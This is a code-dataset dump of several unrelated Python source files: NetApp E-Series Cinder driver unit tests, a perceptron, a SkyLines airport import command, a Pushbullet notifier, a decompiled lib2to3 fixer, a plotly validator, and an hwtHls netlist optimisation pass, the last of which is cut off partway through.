connector = {'wwpns': [eseries_fake.WWPN]}
fake_host = copy.deepcopy(eseries_fake.HOST)
fake_host['hostSidePorts'] = [{
'label': 'NewStore',
'type': 'fc',
'address': eseries_fake.WWPN
}]
volume = copy.deepcopy(eseries_fake.VOLUME)
volume['listOfMappings'] = []
self.mock_object(self.library, '_get_volume',
mock.Mock(return_value=volume))
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[fake_host]))
self.assertRaises(eseries_exc.VolumeNotMapped,
self.library.terminate_connection_fc,
get_fake_volume(),
connector)
def test_terminate_connection_fc_volume_mapped(self):
connector = {'wwpns': [eseries_fake.WWPN]}
fake_host = copy.deepcopy(eseries_fake.HOST)
fake_host['hostSidePorts'] = [{
'label': 'NewStore',
'type': 'fc',
'address': eseries_fake.WWPN
}]
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
fake_eseries_volume['listOfMappings'] = [
copy.deepcopy(eseries_fake.VOLUME_MAPPING)
]
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[fake_host]))
self.mock_object(self.library._client, 'list_volume',
mock.Mock(return_value=fake_eseries_volume))
self.mock_object(host_mapper, 'unmap_volume_from_host')
self.library.terminate_connection_fc(get_fake_volume(), connector)
self.assertTrue(host_mapper.unmap_volume_from_host.called)
def test_terminate_connection_fc_volume_mapped_no_cleanup_zone(self):
connector = {'wwpns': [eseries_fake.WWPN]}
fake_host = copy.deepcopy(eseries_fake.HOST)
fake_host['hostSidePorts'] = [{
'label': 'NewStore',
'type': 'fc',
'address': eseries_fake.WWPN
}]
expected_target_info = {
'driver_volume_type': 'fibre_channel',
'data': {},
}
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
fake_eseries_volume['listOfMappings'] = [
copy.deepcopy(eseries_fake.VOLUME_MAPPING)
]
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[fake_host]))
self.mock_object(self.library._client, 'list_volume',
mock.Mock(return_value=fake_eseries_volume))
self.mock_object(host_mapper, 'unmap_volume_from_host')
self.mock_object(self.library._client, 'get_volume_mappings_for_host',
mock.Mock(return_value=[copy.deepcopy
(eseries_fake.
VOLUME_MAPPING)]))
target_info = self.library.terminate_connection_fc(get_fake_volume(),
connector)
self.assertDictEqual(expected_target_info, target_info)
self.assertTrue(host_mapper.unmap_volume_from_host.called)
def test_terminate_connection_fc_volume_mapped_cleanup_zone(self):
connector = {'wwpns': [eseries_fake.WWPN]}
fake_host = copy.deepcopy(eseries_fake.HOST)
fake_host['hostSidePorts'] = [{
'label': 'NewStore',
'type': 'fc',
'address': eseries_fake.WWPN
}]
expected_target_info = {
'driver_volume_type': 'fibre_channel',
'data': {
'target_wwn': [eseries_fake.WWPN_2],
'initiator_target_map': {
eseries_fake.WWPN: [eseries_fake.WWPN_2]
},
},
}
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
fake_eseries_volume['listOfMappings'] = [
copy.deepcopy(eseries_fake.VOLUME_MAPPING)
]
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[fake_host]))
self.mock_object(self.library._client, 'list_volume',
mock.Mock(return_value=fake_eseries_volume))
self.mock_object(host_mapper, 'unmap_volume_from_host')
self.mock_object(self.library._client, 'get_volume_mappings_for_host',
mock.Mock(return_value=[]))
target_info = self.library.terminate_connection_fc(get_fake_volume(),
connector)
self.assertDictEqual(expected_target_info, target_info)
self.assertTrue(host_mapper.unmap_volume_from_host.called)
def test_terminate_connection_fc_not_mapped_host_with_wwpn_does_not_exist(
self):
connector = {'wwpns': [eseries_fake.WWPN]}
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[eseries_fake.HOST_2]))
self.assertRaises(exception.NotFound,
self.library.terminate_connection_fc,
get_fake_volume(),
connector)
def test_initialize_connection_fc_volume_not_mapped(self):
connector = {'wwpns': [eseries_fake.WWPN]}
self.mock_object(self.library._client,
'get_volume_mappings_for_volume',
mock.Mock(return_value=[]))
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
expected_target_info = {
'driver_volume_type': 'fibre_channel',
'data': {
'target_discovered': True,
'target_lun': 0,
'target_wwn': [eseries_fake.WWPN_2],
'access_mode': 'rw',
'initiator_target_map': {
eseries_fake.WWPN: [eseries_fake.WWPN_2]
},
},
}
target_info = self.library.initialize_connection_fc(get_fake_volume(),
connector)
self.assertTrue(
self.library._client.get_volume_mappings_for_volume.called)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
self.assertDictEqual(expected_target_info, target_info)
def test_initialize_connection_fc_volume_not_mapped_host_does_not_exist(
self):
connector = {'wwpns': [eseries_fake.WWPN]}
self.library.driver_protocol = 'FC'
self.mock_object(self.library._client,
'get_volume_mappings_for_volume',
mock.Mock(return_value=[]))
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[]))
self.mock_object(self.library._client, 'create_host_with_ports',
mock.Mock(return_value=eseries_fake.HOST))
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
self.library.initialize_connection_fc(get_fake_volume(), connector)
self.library._client.create_host_with_ports.assert_called_once_with(
mock.ANY, mock.ANY,
[fczm_utils.get_formatted_wwn(eseries_fake.WWPN)],
port_type='fc', group_id=None
)
def test_initialize_connection_fc_volume_already_mapped_to_target_host(
self):
"""Should be a no-op"""
connector = {'wwpns': [eseries_fake.WWPN]}
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
self.library.initialize_connection_fc(get_fake_volume(), connector)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_initialize_connection_fc_volume_mapped_to_another_host(self):
"""Should raise error saying multiattach not enabled"""
connector = {'wwpns': [eseries_fake.WWPN]}
fake_mapping_to_other_host = copy.deepcopy(
eseries_fake.VOLUME_MAPPING)
fake_mapping_to_other_host['mapRef'] = eseries_fake.HOST_2[
'hostRef']
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
side_effect=exception.NetAppDriverException))
self.assertRaises(exception.NetAppDriverException,
self.library.initialize_connection_fc,
get_fake_volume(), connector)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_initialize_connection_fc_no_target_wwpns(self):
"""Should be a no-op"""
connector = {'wwpns': [eseries_fake.WWPN]}
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
self.mock_object(self.library._client, 'list_target_wwpns',
mock.Mock(return_value=[]))
self.assertRaises(exception.VolumeBackendAPIException,
self.library.initialize_connection_fc,
get_fake_volume(), connector)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_build_initiator_target_map_fc_with_lookup_service(
self):
connector = {'wwpns': [eseries_fake.WWPN, eseries_fake.WWPN_2]}
self.library.lookup_service = mock.Mock()
self.library.lookup_service.get_device_mapping_from_network = (
mock.Mock(return_value=eseries_fake.FC_FABRIC_MAP))
(target_wwpns, initiator_target_map, num_paths) = (
self.library._build_initiator_target_map_fc(connector))
self.assertSetEqual(set(eseries_fake.FC_TARGET_WWPNS),
set(target_wwpns))
self.assertDictEqual(eseries_fake.FC_I_T_MAP, initiator_target_map)
self.assertEqual(4, num_paths)
@ddt.data(('raid0', 'raid0'), ('raid1', 'raid1'), ('raid3', 'raid5'),
('raid5', 'raid5'), ('raid6', 'raid6'), ('raidDiskPool', 'DDP'))
@ddt.unpack
def test_update_ssc_raid_type(self, raid_lvl, raid_lvl_mapping):
pools = [{'volumeGroupRef': 'test_vg1', 'raidLevel': raid_lvl}]
self.library._client.list_storage_pools = mock.Mock(return_value=pools)
ssc_stats = self.library._update_ssc_raid_type(pools)
self.assertEqual({'test_vg1': {'netapp_raid_type': raid_lvl_mapping}},
ssc_stats)
@ddt.data('raidAll', '__UNDEFINED', 'unknown',
'raidUnsupported', 'garbage')
def test_update_ssc_raid_type_invalid(self, raid_lvl):
pools = [{'volumeGroupRef': 'test_vg1', 'raidLevel': raid_lvl}]
self.library._client.list_storage_pools = mock.Mock(return_value=pools)
ssc_stats = self.library._update_ssc_raid_type(pools)
self.assertEqual({'test_vg1': {'netapp_raid_type': 'unknown'}},
ssc_stats)
def test_create_asup(self):
self.library._client = mock.Mock()
self.library._client.features.AUTOSUPPORT = na_utils.FeatureState()
self.library._client.api_operating_mode = (
eseries_fake.FAKE_ASUP_DATA['operating-mode'])
self.library._app_version = eseries_fake.FAKE_APP_VERSION
self.mock_object(
self.library._client, 'get_firmware_version',
mock.Mock(return_value=(
eseries_fake.FAKE_ASUP_DATA['system-version'])))
self.mock_object(
self.library._client, 'get_serial_numbers',
mock.Mock(return_value=eseries_fake.FAKE_SERIAL_NUMBERS))
self.mock_object(
self.library._client, 'get_model_name',
mock.Mock(
return_value=eseries_fake.FAKE_CONTROLLERS[0]['modelName']))
self.mock_object(
self.library._client, 'set_counter',
mock.Mock(return_value={'value': 1}))
mock_invoke = self.mock_object(
self.library._client, 'add_autosupport_data')
self.library._create_asup(eseries_fake.FAKE_CINDER_HOST)
mock_invoke.assert_called_with(eseries_fake.FAKE_KEY,
eseries_fake.FAKE_ASUP_DATA)
def test_create_asup_not_supported(self):
self.library._client = mock.Mock()
self.library._client.features.AUTOSUPPORT = na_utils.FeatureState(
supported=False)
mock_invoke = self.mock_object(
self.library._client, 'add_autosupport_data')
self.library._create_asup(eseries_fake.FAKE_CINDER_HOST)
mock_invoke.assert_not_called()
@ddt.ddt
class NetAppEseriesLibraryMultiAttachTestCase(test.TestCase):
"""Test driver when netapp_enable_multiattach is enabled.
Test driver behavior when the netapp_enable_multiattach configuration
option is True.
"""
def setUp(self):
super(NetAppEseriesLibraryMultiAttachTestCase, self).setUp()
config = eseries_fake.create_configuration_eseries()
config.netapp_enable_multiattach = True
kwargs = {'configuration': config}
self.library = library.NetAppESeriesLibrary("FAKE", **kwargs)
self.library._client = eseries_fake.FakeEseriesClient()
self.library.check_for_setup_error()
def test_do_setup_host_group_already_exists(self):
mock_check_flags = self.mock_object(na_utils, 'check_flags')
self.mock_object(self.library,
'_check_mode_get_or_register_storage_system')
fake_rest_client = eseries_fake.FakeEseriesClient()
self.mock_object(self.library, '_create_rest_client',
mock.Mock(return_value=fake_rest_client))
mock_create = self.mock_object(fake_rest_client, 'create_host_group')
self.library.do_setup(mock.Mock())
self.assertTrue(mock_check_flags.called)
self.assertFalse(mock_create.call_count)
def test_do_setup_host_group_does_not_exist(self):
mock_check_flags = self.mock_object(na_utils, 'check_flags')
fake_rest_client = eseries_fake.FakeEseriesClient()
self.mock_object(self.library, '_create_rest_client',
mock.Mock(return_value=fake_rest_client))
mock_get_host_group = self.mock_object(
fake_rest_client, "get_host_group_by_name",
mock.Mock(side_effect=exception.NotFound))
self.mock_object(self.library,
'_check_mode_get_or_register_storage_system')
self.library.do_setup(mock.Mock())
self.assertTrue(mock_check_flags.called)
self.assertTrue(mock_get_host_group.call_count)
def test_create_volume(self):
self.library._client.create_volume = mock.Mock(
return_value=eseries_fake.VOLUME)
self.library.create_volume(get_fake_volume())
self.assertTrue(self.library._client.create_volume.call_count)
@ddt.data(('netapp_eseries_flash_read_cache', 'flash_cache', 'true'),
('netapp_eseries_flash_read_cache', 'flash_cache', 'false'),
('netapp_eseries_flash_read_cache', 'flash_cache', None),
('netapp_thin_provisioned', 'thin_provision', 'true'),
('netapp_thin_provisioned', 'thin_provision', 'false'),
('netapp_thin_provisioned', 'thin_provision', None),
('netapp_eseries_data_assurance', 'data_assurance', 'true'),
('netapp_eseries_data_assurance', 'data_assurance', 'false'),
('netapp_eseries_data_assurance', 'data_assurance', None),
('netapp:write_cache', 'write_cache', 'true'),
('netapp:write_cache', 'write_cache', 'false'),
('netapp:write_cache', 'write_cache', None),
('netapp:read_cache', 'read_cache', 'true'),
('netapp:read_cache', 'read_cache', 'false'),
('netapp:read_cache', 'read_cache', None),
('netapp_eseries_flash_read_cache', 'flash_cache', 'True'),
('netapp_eseries_flash_read_cache', 'flash_cache', '1'),
('netapp_eseries_data_assurance', 'data_assurance', ''))
@ddt.unpack
def test_create_volume_with_extra_spec(self, spec, key, value):
fake_volume = get_fake_volume()
extra_specs = {spec: value}
volume = copy.deepcopy(eseries_fake.VOLUME)
self.library._client.create_volume = mock.Mock(
return_value=volume)
# Make this utility method return our extra spec
mocked_spec_method = self.mock_object(na_utils,
'get_volume_extra_specs')
mocked_spec_method.return_value = extra_specs
self.library.create_volume(fake_volume)
self.assertEqual(1, self.library._client.create_volume.call_count)
# Ensure create_volume is called with the correct argument
args, kwargs = self.library._client.create_volume.call_args
self.assertIn(key, kwargs)
if(value is not None):
expected = na_utils.to_bool(value)
else:
expected = value
self.assertEqual(expected, kwargs[key])
def test_create_volume_too_many_volumes(self):
self.library._client.list_volumes = mock.Mock(
return_value=[eseries_fake.VOLUME for __ in
range(utils.MAX_LUNS_PER_HOST_GROUP + 1)])
self.library._client.create_volume = mock.Mock(
return_value=eseries_fake.VOLUME)
self.assertRaises(exception.NetAppDriverException,
self.library.create_volume,
get_fake_volume())
self.assertFalse(self.library._client.create_volume.call_count)
def test_create_volume_from_snapshot(self):
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
self.mock_object(self.library, "_schedule_and_create_volume",
mock.Mock(return_value=fake_eseries_volume))
self.mock_object(self.library, "_create_snapshot_volume",
mock.Mock(return_value=fake_eseries_volume))
self.mock_object(self.library._client, "delete_snapshot_volume")
self.library.create_volume_from_snapshot(
get_fake_volume(), fake_snapshot.fake_snapshot_obj(None))
self.assertEqual(
1, self.library._schedule_and_create_volume.call_count)
self.assertEqual(1, self.library._create_snapshot_volume.call_count)
self.assertEqual(
1, self.library._client.delete_snapshot_volume.call_count)
def test_create_volume_from_snapshot_create_fails(self):
fake_dest_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
self.mock_object(self.library, "_schedule_and_create_volume",
mock.Mock(return_value=fake_dest_eseries_volume))
self.mock_object(self.library, "_create_snapshot_volume",
mock.Mock(side_effect=exception.NetAppDriverException)
)
self.mock_object(self.library._client, "delete_snapshot_volume")
self.mock_object(self.library._client, "delete_volume")
self.assertRaises(exception.NetAppDriverException,
self.library.create_volume_from_snapshot,
get_fake_volume(),
fake_snapshot.fake_snapshot_obj(None))
self.assertEqual(
1, self.library._schedule_and_create_volume.call_count)
self.assertEqual(1, self.library._create_snapshot_volume.call_count)
self.assertEqual(
0, self.library._client.delete_snapshot_volume.call_count)
# Ensure the volume we were going to copy to is cleaned up
self.library._client.delete_volume.assert_called_once_with(
fake_dest_eseries_volume['volumeRef'])
def test_create_volume_from_snapshot_copy_job_fails(self):
fake_dest_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
self.mock_object(self.library, "_schedule_and_create_volume",
mock.Mock(return_value=fake_dest_eseries_volume))
self.mock_object(self.library, "_create_snapshot_volume",
mock.Mock(return_value=fake_dest_eseries_volume))
self.mock_object(self.library._client, "delete_snapshot_volume")
self.mock_object(self.library._client, "delete_volume")
fake_failed_volume_copy_job = copy.deepcopy(
eseries_fake.VOLUME_COPY_JOB)
fake_failed_volume_copy_job['status'] = 'failed'
self.mock_object(self.library._client,
"create_volume_copy_job",
mock.Mock(return_value=fake_failed_volume_copy_job))
self.mock_object(self.library._client,
"list_vol_copy_job",
mock.Mock(return_value=fake_failed_volume_copy_job))
self.assertRaises(exception.NetAppDriverException,
self.library.create_volume_from_snapshot,
get_fake_volume(),
fake_snapshot.fake_snapshot_obj(None))
self.assertEqual(
1, self.library._schedule_and_create_volume.call_count)
self.assertEqual(1, self.library._create_snapshot_volume.call_count)
self.assertEqual(
1, self.library._client.delete_snapshot_volume.call_count)
# Ensure the volume we were going to copy to is cleaned up
self.library._client.delete_volume.assert_called_once_with(
fake_dest_eseries_volume['volumeRef'])
def test_create_volume_from_snapshot_fail_to_delete_snapshot_volume(self):
fake_dest_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
fake_dest_eseries_volume['volumeRef'] = 'fake_volume_ref'
self.mock_object(self.library, "_schedule_and_create_volume",
mock.Mock(return_value=fake_dest_eseries_volume))
self.mock_object(self.library, "_create_snapshot_volume",
mock.Mock(return_value=copy.deepcopy(
eseries_fake.VOLUME)))
self.mock_object(self.library._client, "delete_snapshot_volume",
mock.Mock(side_effect=exception.NetAppDriverException)
)
self.mock_object(self.library._client, "delete_volume")
self.library.create_volume_from_snapshot(
get_fake_volume(), fake_snapshot.fake_snapshot_obj(None))
self.assertEqual(
1, self.library._schedule_and_create_volume.call_count)
self.assertEqual(1, self.library._create_snapshot_volume.call_count)
self.assertEqual(
1, self.library._client.delete_snapshot_volume.call_count)
# Ensure the volume we created is not cleaned up
self.assertEqual(0, self.library._client.delete_volume.call_count)
def test_extend_volume(self):
fake_volume = copy.deepcopy(get_fake_volume())
volume = copy.deepcopy(eseries_fake.VOLUME)
new_capacity = 10
volume['objectType'] = 'volume'
self.library.create_cloned_volume = mock.Mock()
self.library._get_volume = mock.Mock(return_value=volume)
self.library._client.update_volume = mock.Mock()
self.library.extend_volume(fake_volume, new_capacity)
self.library.create_cloned_volume.assert_called_with(mock.ANY,
fake_volume)
def test_extend_volume_thin(self):
fake_volume = copy.deepcopy(get_fake_volume())
volume = copy.deepcopy(eseries_fake.VOLUME)
new_capacity = 10
volume['objectType'] = 'thinVolume'
self.library._client.expand_volume = mock.Mock(return_value=volume)
self.library._get_volume = mock.Mock(return_value=volume)
self.library.extend_volume(fake_volume, new_capacity)
self.library._client.expand_volume.assert_called_with(volume['id'],
new_capacity)
def test_extend_volume_stage_2_failure(self):
fake_volume = copy.deepcopy(get_fake_volume())
volume = copy.deepcopy(eseries_fake.VOLUME)
new_capacity = 10
volume['objectType'] = 'volume'
self.library.create_cloned_volume = mock.Mock()
self.library._client.delete_volume = mock.Mock()
# Create results for multiple calls to _get_volume and _update_volume
get_volume_results = [volume, {'id': 'newId', 'label': 'newVolume'}]
self.library._get_volume = mock.Mock(side_effect=get_volume_results)
update_volume_results = [volume, exception.NetAppDriverException,
volume]
self.library._client.update_volume = mock.Mock(
side_effect=update_volume_results)
self.assertRaises(exception.NetAppDriverException,
self.library.extend_volume, fake_volume,
new_capacity)
self.assertTrue(self.library._client.delete_volume.called)
def test_extend_volume_stage_1_failure(self):
fake_volume = copy.deepcopy(get_fake_volume())
volume = copy.deepcopy(eseries_fake.VOLUME)
new_capacity = 10
volume['objectType'] = 'volume'
self.library.create_cloned_volume = mock.Mock()
self.library._get_volume = mock.Mock(return_value=volume)
self.library._client.update_volume = mock.Mock(
side_effect=exception.NetAppDriverException)
self.assertRaises(exception.NetAppDriverException,
self.library.extend_volume, fake_volume,
new_capacity)
def test_delete_non_existing_volume(self):
volume2 = get_fake_volume()
# Change to a nonexistent id.
volume2['name_id'] = '88888888-4444-4444-4444-cccccccccccc'
self.assertIsNone(self.library.delete_volume(volume2))
def test_map_volume_to_host_volume_not_mapped(self):
"""Map the volume directly to destination host."""
self.mock_object(self.library._client,
'get_volume_mappings_for_volume',
mock.Mock(return_value=[]))
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
self.library.map_volume_to_host(get_fake_volume(),
eseries_fake.VOLUME,
eseries_fake.INITIATOR_NAME_2)
self.assertTrue(
self.library._client.get_volume_mappings_for_volume.called)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_map_volume_to_host_volume_not_mapped_host_does_not_exist(self):
"""Should create the host map directly to the host."""
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[]))
self.mock_object(self.library._client, 'create_host_with_ports',
mock.Mock(
return_value=eseries_fake.HOST_2))
self.mock_object(self.library._client,
'get_volume_mappings_for_volume',
mock.Mock(return_value=[]))
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
self.library.map_volume_to_host(get_fake_volume(),
eseries_fake.VOLUME,
eseries_fake.INITIATOR_NAME_2)
self.assertTrue(self.library._client.create_host_with_ports.called)
self.assertTrue(
self.library._client.get_volume_mappings_for_volume.called)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_map_volume_to_host_volume_already_mapped(self):
"""Should be a no-op."""
self.mock_object(host_mapper, 'map_volume_to_multiple_hosts',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
self.library.map_volume_to_host(get_fake_volume(),
eseries_fake.VOLUME,
eseries_fake.INITIATOR_NAME)
self.assertTrue(host_mapper.map_volume_to_multiple_hosts.called)
| Paul-Ezell/cinder-1 | cinder/tests/unit/volume/drivers/netapp/eseries/test_library.py | Python | apache-2.0 | 54,418 |
import numpy as np
class Perceptron(object):
def __init__(self, bias=0, eta=0.1, epoch=10):
self.bias = bias
self.eta = eta
self.epoch = epoch
def net_input(self, x):
return self.weights[0] + np.dot(x, self.weights[1:])
def fit(self, X, y):
self.weights = np.zeros(1 + X.shape[1])
self.weights[0] = -self.bias
self.errors = []
for _ in range(self.epoch):
errors = 0
for xi, yi in zip(X, y):
# compute error and delta_w
error = yi - self.predict(xi)
delta_w = self.eta * error * xi
# update weights
self.weights[1:] += delta_w
self.weights[0] += error
# append to error count
errors += int(error != 0)
self.errors.append(errors)
return self
def predict(self, x):
return np.where(self.net_input(x) >= 0, 1, -1)
| jeancochrane/learning | python-machine-learning/code/algos/perceptron.py | Python | mit | 984 |
from flask_script import Command, Option
from skylines.database import db
from skylines.model import Airport
from skylines.lib.waypoints.welt2000 import get_database
from datetime import datetime
from sqlalchemy.sql.expression import or_, and_
class Welt2000(Command):
""" Import all airports from the WELT2000 project """
option_list = (
Option('--commit', action='store_true',
help='commit changes. Otherwise no changes are made to the database'),
Option('welt2000_path', nargs='?', metavar='WELT2000.TXT',
help='path to the WELT2000 file'),
)
def run(self, commit, welt2000_path):
welt2000 = get_database(path=welt2000_path)
self.current_date = datetime.utcnow()
i = 0
for airport_w2k in welt2000:
if (airport_w2k.type != 'airport' and
airport_w2k.type != 'glider_site' and
airport_w2k.type != 'ulm'):
continue
i += 1
if i % 100 == 0:
db.session.flush()
print str(i) + ": " + airport_w2k.country_code + " " + airport_w2k.name
# try to find this airport in the database
near_airport = Airport.query() \
.filter(and_(Airport.short_name == airport_w2k.short_name,
Airport.country_code == airport_w2k.country_code)) \
.filter(or_(Airport.valid_until == None, Airport.valid_until > self.current_date)) \
.first()
# fall back to location-search if airport is not found
# and only reuse this airport if it's within 250 meters of the old one...
if near_airport is None or near_airport.distance(airport_w2k) > 250:
near_airport = Airport.by_location(airport_w2k, distance_threshold=0.0025)
if near_airport is None:
# this airport is not in our database yet. add it...
self.add_airport(airport_w2k)
else:
# seems to be the same airport. update with current values
self.show_differences(near_airport, airport_w2k)
self.update_airport(near_airport, airport_w2k)
db.session.flush()
# now invalidate all remaining airports
invalid_airports = Airport.query() \
.filter(Airport.time_modified < self.current_date) \
.filter(or_(Airport.valid_until == None, Airport.valid_until > self.current_date))
for airport in invalid_airports:
print "{} {} {}" \
.format(airport.country_code, airport.name, airport.icao)
print " invalidated"
airport.valid_until = self.current_date
if commit:
db.session.commit()
def add_airport(self, airport_w2k):
airport = Airport()
self.update_airport(airport, airport_w2k)
db.session.add(airport)
def update_airport(self, airport, airport_w2k):
airport.location = airport_w2k
airport.altitude = airport_w2k.altitude
airport.name = airport_w2k.name
airport.short_name = airport_w2k.short_name
airport.icao = airport_w2k.icao
airport.country_code = airport_w2k.country_code
airport.surface = airport_w2k.surface
airport.runway_len = airport_w2k.runway_len
airport.runway_dir = airport_w2k.runway_dir
airport.frequency = airport_w2k.freq
airport.type = airport_w2k.type
airport.time_modified = self.current_date
def show_differences(self, airport, airport_w2k):
def row2dict(r):
return {c.name: getattr(r, c.name) for c in r.__table__.columns}
diff = DictDiffer(row2dict(airport), airport_w2k.__dict__)
changed = diff.changed()
distance = airport.distance(airport_w2k)
if changed or distance > 0.1:
print "{} {} {}" \
.format(airport.country_code, airport.name, airport.icao)
if distance > 0.1:
print " moved by {}m".format(distance)
for item in changed:
print " {} from {} to {}" \
.format(item, row2dict(airport)[item], airport_w2k.__dict__[item])
class DictDiffer(object):
"""
Calculate the difference between two dictionaries as:
(1) items added
(2) items removed
(3) keys same in both but changed values
(4) keys same in both and unchanged values
"""
def __init__(self, current_dict, past_dict):
self.current_dict, self.past_dict = current_dict, past_dict
self.set_current, self.set_past = set(current_dict.keys()), set(past_dict.keys())
self.intersect = self.set_current.intersection(self.set_past)
def added(self):
return self.set_current - self.intersect
def removed(self):
return self.set_past - self.intersect
def changed(self):
return set(o for o in self.intersect if self.past_dict[o] != self.current_dict[o])
def unchanged(self):
return set(o for o in self.intersect if self.past_dict[o] == self.current_dict[o])
| shadowoneau/skylines | skylines/commands/import_/welt2000.py | Python | agpl-3.0 | 5,171 |
from couchpotato.core.helpers.encoding import toUnicode
from couchpotato.core.helpers.variable import tryInt
from couchpotato.core.logger import CPLog
from couchpotato.core.notifications.base import Notification
import base64
import json
log = CPLog(__name__)
class Pushbullet(Notification):
url = 'https://api.pushbullet.com/api/%s'
def notify(self, message = '', data = None, listener = None):
if not data: data = {}
devices = self.getDevices()
if devices is None:
return False
# Get all the device IDs linked to this user
if not len(devices):
response = self.request('devices')
if not response:
return False
devices += [device.get('id') for device in response['devices']]
successful = 0
for device in devices:
response = self.request(
'pushes',
cache = False,
device_id = device,
type = 'note',
title = self.default_title,
body = toUnicode(message)
)
if response:
successful += 1
else:
log.error('Unable to push notification to Pushbullet device with ID %s' % device)
return successful == len(devices)
def getDevices(self):
devices = [d.strip() for d in self.conf('devices').split(',')]
# Remove empty items
devices = [d for d in devices if len(d)]
# Break on any ids that aren't integers
valid_devices = []
for device_id in devices:
d = tryInt(device_id, None)
if not d:
log.error('Device ID "%s" is not valid', device_id)
return None
valid_devices.append(d)
return valid_devices
def request(self, method, cache = True, **kwargs):
try:
base64string = base64.encodestring('%s:' % self.conf('api_key'))[:-1]
headers = {
"Authorization": "Basic %s" % base64string
}
if cache:
return self.getJsonData(self.url % method, headers = headers, data = kwargs)
else:
data = self.urlopen(self.url % method, headers = headers, data = kwargs)
return json.loads(data)
except Exception, ex:
log.error('Pushbullet request failed')
log.debug(ex)
return None
| rooi/CouchPotatoServer | couchpotato/core/notifications/pushbullet/main.py | Python | gpl-3.0 | 2,483 |
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: fix_standarderror.py
"""Fixer for StandardError -> Exception."""
from .. import fixer_base
from ..fixer_util import Name
class FixStandarderror(fixer_base.BaseFix):
BM_compatible = True
PATTERN = "\n 'StandardError'\n "
def transform(self, node, results):
return Name('Exception', prefix=node.prefix) | DarthMaulware/EquationGroupLeaks | Leak #5 - Lost In Translation/windows/Resources/Python/Core/Lib/lib2to3/fixes/fix_standarderror.py | Python | unlicense | 519 |
import _plotly_utils.basevalidators
class CmidValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="cmid", parent_name="scatterpolargl.marker", **kwargs
):
super(CmidValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
implied_edits=kwargs.pop("implied_edits", {}),
**kwargs
)
| plotly/plotly.py | packages/python/plotly/plotly/validators/scatterpolargl/marker/_cmid.py | Python | mit | 474 |
from typing import List
from hwtHls.netlist.nodes.io import HlsNetNodeExplicitSync, HlsNetNodeRead, HlsNetNodeWrite
from hwtHls.netlist.nodes.node import HlsNetNode
from hwtHls.netlist.transformation.hlsNetlistPass import HlsNetlistPass
from itertools import chain
class HlsNetlistPassMergeExplicitSync(HlsNetlistPass):
"""
Merge nodes with explicit synchronization (HlsNetNodeRead, HlsNetNodeWrite, HlsNetNodeExplicitSync) together
if possible to reduce the number of places where we need to solve the synchronisation.
"""
@staticmethod
def _apply(nodes: List[HlsNetNode]):
to_rm = set()
for n in nodes:
if n not in to_rm and n.__class__ is HlsNetNodeExplicitSync:
n: HlsNetNodeExplicitSync
dep0 = n.dependsOn[0].obj
# merge sync to previous object if possible
if isinstance(dep0, HlsNetNodeRead) and len(dep0.usedBy[0]) == 1:
# check if we did not generate cycle because sync was dependent on value of previous read
dep0: HlsNetNodeRead
if n.extraCond is not None:
n.extraCond.obj.usedBy[n.extraCond.out_i].remove(n._inputs[n.extraCond_inI])
dep0.add_control_extraCond(n.extraCond)
if n.skipWhen is not None:
n.skipWhen.obj.usedBy[n.skipWhen.out_i].remove(n._inputs[n.skipWhen_inI])
dep0.add_control_skipWhen(n.skipWhen)
for orderIn in n.iterOrderingInputs():
orderDep = n.dependsOn[orderIn.in_i]
if orderDep is not dep0 and not any(depOfDep is orderDep for depOfDep in orderDep.obj.dependsOn):
orderIn.obj = dep0
orderIn.in_i = len(dep0._inputs)
dep0._inputs.append(orderIn)
dep0.dependsOn.append(orderDep)
# transfer output from this HlsNetNodeExplicitSync to HlsNetNodeRead (to avoid modificaion of potentially unknown objects behind HlsNetNodeExplicitSync)
dep0._outputs = n._outputs
for o in dep0._outputs:
o.obj = dep0
assert len(n.usedBy) == 2, (n, n.usedBy)
assert len(dep0.usedBy) == 2, (n, dep0.usedBy)
dep0.usedBy[0] = n.usedBy[0]
dep0.usedBy[1] = list(use for use in chain(dep0.usedBy[1], n.usedBy[1]) if use.obj is not n or dep0)
to_rm.add(n)
else:
# merge this node into successor if possible
sucs, order = n.usedBy
if len(sucs) == 1:
suc0 = sucs[0].obj
if isinstance(suc0, HlsNetNodeExplicitSync):
raise NotImplementedError()
elif isinstance(suc0, HlsNetNodeWrite):
raise NotImplementedError()
if to_rm:
